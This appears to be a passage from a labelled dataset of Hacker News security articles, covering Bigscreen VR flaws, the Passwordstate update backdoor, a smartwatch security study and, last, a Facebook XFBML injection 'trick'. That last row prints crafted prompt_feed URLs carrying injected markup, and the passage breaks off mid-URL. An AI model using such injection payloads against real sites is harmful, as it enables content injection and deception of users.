The team found that Bigscreen application uses Dynamically Loaded Libraries (DLLs) without integrity checking that allowed the researchers to modify the source code of selected libraries and change its behavior, letting them hide their presence from UI using XSS payloads.
""Our proof-of-concept WebRTC application was able to connect to legitimate Bigscreen application. This lead to complete control over one end of audio/video/microphone/data streams. Our application was invisible in the VR room because it did not send any data to other peers,"" the researchers said.
The team responsibly reported their findings to both Bigscreen and Unity. Bigscreen acknowledged the security vulnerabilities in its ""servers and streaming systems"" and released the new Bigscreen Beta ""2019 Update"" that fully patched the issues.
Moreover, Unity acknowledged the vulnerabilities by merely adding a note to its documentation stating that its platform ""can be used to open more than just web pages, so it has important security implication you must be aware of.""
",Vulnerability
Passwordstate Password Manager Update Hijacked to Install Backdoor on Thousands of PCs,https://thehackernews.com/2021/04/passwordstate-password-manager-update.html,"Click Studios, the Australian software company behind the Passwordstate password management application, has notified customers to reset their passwords following a supply chain attack.
The Adelaide-based firm said a bad actor used sophisticated techniques to compromise the software's update mechanism and used it to drop malware on user computers.
The breach is said to have occurred between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC, for a total period of about 28 hours.
""Only customers that performed In-Place Upgrades between the times stated above are believed to be affected,"" the company said in an advisory. ""Manual Upgrades of Passwordstate are not compromised. Affected customers password records may have been harvested.""
The development was first reported by the Polish tech news site Niebezpiecznik. It's not immediately clear who the attackers are or how they compromised the password manager's update feature. Click Studios said an investigation into the incident is ongoing but noted ""the number of affected customers appears to be very low.""
Passwordstate is an on-premise web-based solution used for enterprise password management, enabling businesses to securely store passwords, integrate the solution into their applications, and reset passwords across a range of systems, among others. The software is used by 29,000 customers and 370,000 security and IT professionals globally, counting several Fortune 500 companies spanning verticals such as banking, insurance, defense, government, education, and manufacturing.
According to an initial analysis shared by Denmark-based security firm CSIS Group, the malware-laced update came in the form of a ZIP archive file, ""Passwordstate_upgrade.zip,"" which contained a modified version of a library called ""moserware.secretsplitter.dll"" (VirusTotal submissions here and here).
This file, in turn, established contact with a remote server to fetch a second-stage payload (""upgrade_service_upgrade.zip"") that extracted Passwordstate data and exported the information back to the adversary's CDN network. Click Studios said the server was taken down as of April 22 at 7:00 AM UTC.
The full list of compromised information includes computer name, user name, domain name, current process name, current process id, names and IDs of all running processes, names of all running services, display name and status, Passwordstate instance's Proxy Server Address, usernames and passwords..
Click Studios has released a hotfix package to help customers remove the attacker's tampered DLL and overwrite it with a legitimate variant. The company is also recommending that businesses reset all credentials associated with external facing systems (firewalls, VPN) as well as internal infrastructure (storage systems, local systems) and any other passwords stored in Passwordstate.
Passwordstate's breach comes as supply chain attacks are fast emerging a new threat to companies that depend on third-party software vendors for their day-to-day operations. In December 2020, a rogue update to the SolarWinds Orion network management software installed a backdoor on the networks of up to 18,000 customers.
Last week, software auditing startup Codecov alerted customers that it discovered its software had been infected with a backdoor as early as January 31 to gain access to authentication tokens for various internal software accounts used by developers. The incident didn't come to light until April 1.
",Cyber_Attack
All Smartwatches are vulnerable to Hackers,https://thehackernews.com/2015/07/smartwatch-hacking.html,"Do you own a Smartwatch? If yes, then how safe it is? There are almost 100 percent chances that you own a vulnerable Smartwatch.
Computer manufacturer Hewlett-Packard is warning users of smartwatches including Apple Watch and Samsung Gear that their wearable devices are vulnerable to cyber attacks.
In a study, HP's Fortify tested today's top 10 smartwatches for security features, such as basic data encryption, password protection and privacy concerns.
The most shocking part of the study was that –
Not even a Single Smartwatch Found to be 100 percent Safe
Security experts found that 100 percent of wearable devices contained at least one serious security vulnerability that could make the devices vulnerable to hackers.
With the increase in the adoption of smartwatches, manufacturers need to pay closer attention to the customers' security because these wearable devices could potentially open doors to new threats to personal and sensitive information.
""As the adoption of Smartwatches accelerates, the platform will become vastly more attractive to those who would abuse that access, making it critical that we take precautions when transmitting personal data or connecting Smartwatches into corporate networks,"" Jason Schmitt, general manager at HP's Security Fortify said in a statement.
The study [PDF], no doubt, had included Smart watches by Apple, Pebble, Samsung and Sony, as it claims to have picked top 10 smartwatches.
Here's the list of issues reported by HP:
1. Lack of transport encryption – Though all products implemented transport encryption using SSL/TLS, 40 percent of devices found to be either vulnerable to the POODLE attack, allowing the use of weak cyphers, or still using SSL v2.
2. Insecure Interfaces – Three out of ten smartwatches used cloud-based web interfaces and all of them were vulnerable to account harvesting. This allowed unlimited login attempts, helping hackers guess passwords.
3. Insufficient User Authentication/Authorization – Three out of ten smartwatches completely failed to offer Two-Factor authentication, or the ability to lock accounts after 3 to 5 failed password attempts.
4. Insecure Software/Firmware – 7 out of 10 smartwatches had issues with firmware updates. The wearable devices, including smartwatches, often did not receive encrypted firmware updates, but many updates were signed to help prevent malicious firmware updates from being installed. While a lack of encryption did not allow the files to be downloaded and analyzed.
5. Privacy Concerns – Smartwatches also demonstrate a risk to personal security as well as privacy. All the tested devices collected some form of personal information, including username, address, date of birth, gender, heart rate, weight and other health information.
The experts said it would not disclose the names of smartphone manufacturers whose watches they had tested, but they are working with vendors to ""build security into their products before they put them out to market.""
Meanwhile, HP urges users to not connect their smartwatches to the sensitive access control functions like cars or homes unless strong authorization is offered.
",Vulnerability
Facebook Status Update With XFBML Injection,https://thehackernews.com/2011/08/facebook-status-update-with-xfbml.html,"Facebook Status Update With XFBML Injection
i Last week Acizninja DeadcOde share Tweaking Facebook Status with HTML button. Well today he is going to share another kind of cool tricks to tweak Facebook Status Update using XFBML Injection. With this tweak, we will do an injection on Facebook URL and then share the results of the injections on our Facebook status .Here's the preview and the url code :
LIVE STREAM : https://www.facebook.com/unix.root/posts/217926581593127
[code]
https://www.facebook.com/connect/prompt_feed.php?display=touch&api_key=209403259107231&link=https://t.co/q3EzkPR&attachment={%27description%27%3A%27%3Cfb:live-stream%20event_app_id=%22266225821384%22%20width=%22400%22%20height=%22500%22%20xid=%22%22%20via_url=%22https://t.co/q3EzkPR%22%20always_post_to_friends=%22false%22%3E%3C/fb:live-stream%3E+%27}
[/code]
TEXT AREA : https://www.facebook.com/unix.root/posts/136123736478234
[code]
https://www.facebook.com/connect/prompt_feed.php?&api_key=209403259107231&attachment={%27name%27:%27%20%3Ccenter%3E%3Cfb:editor-text%20label=%22Powered%20By%22%20name=%22title%22%20value=%22%20https://thehackernews.com%22/%3E%3C/br%3E%3Ccenter%3E%3C/center%3E%3Cfb:editor-textarea%20label=%22Komentar%20Anda%22%20name=%22comment%22%20value=%22%20JEMPOL%22/%3E%3Cfb:editor-buttonset%3E%3Ccenter%3E%3Cbutton+type%3D%22button%22%3EKomentari%3C/button%3E%3C/center%3E%27}
[/code]
CAPTCHA : https://www.facebook.com/unix.root/posts/248809308482674
[code]
https://www.facebook.com/connect/prompt_feed.php?&attachment={'href'%3A'http%3A%2F%2Fthehackernews.com'%2C'name'%3A'+